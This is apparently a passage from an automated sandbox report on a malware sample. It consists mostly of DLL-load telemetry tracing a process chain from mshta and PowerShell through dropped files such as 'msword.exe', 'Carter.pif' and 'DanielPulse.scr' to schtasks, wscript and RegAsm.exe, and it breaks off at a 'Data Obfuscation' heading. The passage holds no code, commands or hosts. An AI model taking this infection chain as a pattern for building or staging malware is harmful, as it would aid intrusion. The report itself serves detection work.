              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: riched20.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: usp10.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: msls31.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: napinsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: pnrpnsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wshbth.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: nlaapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: winrnr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: aclayers.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: avicap32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: msvfw32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp

              Data Obfuscation

